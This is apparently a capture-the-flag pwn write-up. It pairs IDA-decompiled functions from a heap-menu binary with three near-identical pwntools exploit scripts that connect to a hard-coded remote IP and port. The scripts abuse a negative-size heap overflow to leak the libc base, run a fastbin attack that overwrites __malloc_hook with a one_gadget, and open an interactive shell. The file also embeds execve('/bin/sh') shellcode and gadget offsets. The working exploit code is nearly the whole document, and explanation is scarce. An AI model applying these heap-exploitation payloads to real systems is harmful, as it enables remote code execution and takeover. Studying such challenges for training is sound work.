IDA
1.menu
2.ADD
unsigned __int64 add()
{
unsigned int i; // [rsp+8h] [rbp-1018h]
unsigned int v2; // [rsp+Ch] [rbp-1014h]
char v3[4096]; // [rsp+10h] [rbp-1010h] BYREF
unsigned __int64 v4; // [rsp+1018h] [rbp-8h]
v4 = __readfsqword(0x28u);
memset(v3, 0, sizeof(v3));
for ( i = 0; i <= 9; ++i )
{
if ( !*(&ptr + i) )
{
v2 = i;
break;
}
}
if ( i == 11 )
{
puts("wrong");
exit(0);
}
*(&ptr + v2) = malloc(0x60uLL);
Size[v2] = 96;
puts("Done");
return __readfsqword(0x28u) ^ v4;
}
3.EDIT
unsigned __int64 edit()
{
int nbytes; // [rsp+0h] [rbp-10h] BYREF
unsigned int nbytes_4; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v3; // [rsp+8h] [rbp-8h]
v3 = __readfsqword(0x28u);
puts("Index:");
__isoc99_scanf("%d", &nbytes_4);
puts("Size:");
__isoc99_scanf("%d", &nbytes);
if ( nbytes <= 96 )
{
if ( *(&ptr + nbytes_4) )
{
puts("Content:");
read(0, *(&ptr + nbytes_4), (unsigned int)nbytes);
}
else
{
puts("wrong");
}
}
else
{
puts("wrong!");
}
return __readfsqword(0x28u) ^ v3;
}
无符号整型,整数溢出
4.Show
unsigned __int64 show()
{
unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
puts("Index:");
__isoc99_scanf("%d", &v1);
if ( *(&ptr + v1) )
printf("Content: %s\n", (const char *)*(&ptr + v1));
return __readfsqword(0x28u) ^ v2;
}
5.delete
unsigned __int64 delete()
{
unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]
v2 = __readfsqword(0x28u);
puts("Index:");
__isoc99_scanf("%d", &v1);
if ( v1 > 0xB )
{
puts("wrong");
exit(0);
}
free(*(&ptr + v1));
*(&ptr + v1) = 0LL;
Size[v1] = 0;
return __readfsqword(0x28u) ^ v2;
}
EXP
from pwn import *
#io=process("./pwn")
io=remote("106.54.163.94", 20017)
elf=ELF("./pwn")
libc=ELF("./libc-2.23.so")
def dbg():
gdb.attach(io)
pause()
def cmd(choice):
io.recvuntil(">>")
io.sendline(str(choice))
def add():
cmd(1)
def delete(index):
cmd(2)
io.recvuntil("Index:")
io.sendline(str(index))
def show(index):
cmd(3)
io.recvuntil("Index:")
io.sendline(str(index))
def edit(index,size,content):
cmd(4)
io.recvuntil("Index:")
io.sendline(str(index))
io.recvuntil("Size:")
io.sendline(str(size))
io.recvuntil("Content:")
io.send(content)
add()#0
add()#1
add()#2
add()#3
payload=b'A'*0x60+p64(0)+p64(0xe1)
edit(0,-1,payload)
delete(1)
add()#1
show(2)
malloc_hook=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-88-0x10
print('malloc_hook:'+hex(malloc_hook))
base=malloc_hook-libc.sym['__malloc_hook']
onegadget=base+0x4527a
delete(1)
edit(0,-1,b'A'*0x60+p64(0)+p64(0x71)+p64(malloc_hook-0x23))
add()#1
add()#4
edit(4,-1,b'\x00'*0x13+p64(onegadget))
add()
io.interactive()
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
#io = process("./pwn")
io = remote("106.54.163.94", 20017)
elf = ELF("./pwn")
libc = ELF("./libc-2.23.so")
def add():
io.sendlineafter(">> ", "1")
def delete(idx):
io.sendlineafter(">> ", "2")
io.sendlineafter("Index:", str(idx))
def show(idx):
io.sendlineafter(">> ", "3")
io.sendlineafter("Index:", str(idx))
def edit(idx, size, content):
io.sendlineafter(">> ", "4")
io.sendlineafter("Index:", str(idx))
io.sendlineafter("Size:", str(size))
io.sendlineafter("Content:", content)
def attach():
gdb.attach(io)
pause()
# leak libc_base
add() #0
add() #1
add() #2
add() #3
edit(0, -1, b'\x00'*0x68 + p64(0x70*2+1))
delete(1)
add() #1
show(2)
libc_base = u64(io.recvuntil("\x7f")[-6:].ljust(8, b'\x00')) - 0x3c4b78
print("[+]libc base = " + str(hex(libc_base)))
malloc_hook = libc_base + libc.symbols['__malloc_hook']
fake_chunk = malloc_hook - 0x23
sh = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
delete(1)
edit(0, -1, b'\x00'*0x68 + p64(0x71) + p64(fake_chunk))
add() #1
add() #4 fack_chunk
edit(4, 0x30, b'\x00'*0x13 + p64(libc_base + sh[1])) # modify
add() #trigger
io.interactive()
#encoding = utf-8
from pwn import *
from LibcSearcher import *
context(log_level = 'debug', os = 'linux', arch = 'amd64')
local = 3
if local == 1 :
sh = process([b"./ld.so", b"./pwn"], env = {"LD_PRELOAD" : b"./libc.so.6"})
elif local == 2 :
sh = process("./pwn")
else :
sh = remote('106.54.163.94', 20017)
elf = ELF('./pwn')
libc = ELF('./libc-2.23.so')
def dbg():
gdb.attach(sh)
pause()
s = lambda data :sh.send(data)
sa = lambda text, data :sh.sendafter(text, data)
sl = lambda data :sh.sendline(data)
sla = lambda text, data :sh.sendlineafter(text, data)
r = lambda num :sh.recv(num)
ru = lambda text :sh.recvuntil(text)
uu32 = lambda :u32(sh.recvuntil("\xf7")[-4:].ljust(4, b"\x00"))
uu64 = lambda :u64(sh.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))
lg = lambda s :sh.success('\033[32m%s -> 0x%x\033[0m' % (s, eval(s)))
lgl = lambda s, value :sh.success('\033[32m%s -> 0x%x\033[0m' % (s, value))
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#------------------------------------------------------------------------------------------------------#
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
def add(): # malloc(0x60)
sla('>> ', b'1')
def delete(idx):
sla('>> ', b'2')
sla('Index:', str(idx))
def show(idx):
sla('>> ', b'3')
sla('Index:', str(idx))
def edit(idx, size, content):
sla('>> ', b'4')
sla('Index:', str(idx))
sla('Size:', str(size))
sa('Content:', content)
add() # 0
add() # 1
add() # 2
add() # 3
add() # 4
add() # 5
pld = b'\x00' * 0x68 + p64(0x70 * 2 + 1)
edit(0, -1, pld)
delete(1)
add() # 1
show(2)
libc_base = uu64() - 0x3c4b78
lg('libc_base')
ogg = libc_base + 0x4527a
malloc_hook = libc_base + libc.sym['__malloc_hook']
fake_chunk = malloc_hook - 0x20 - 3
lg('malloc_hook')
lg('fake_chunk')
delete(4)
pld = b'\x00' * 0x68 + p64(0x71) + p64(fake_chunk)
edit(3, -1, pld)
add() # 4
add() # 6
pld = b'\x00' * (0x10 + 3) + p64(ogg)
edit(6, -1, pld)
# dbg()
add()
sh.interactive()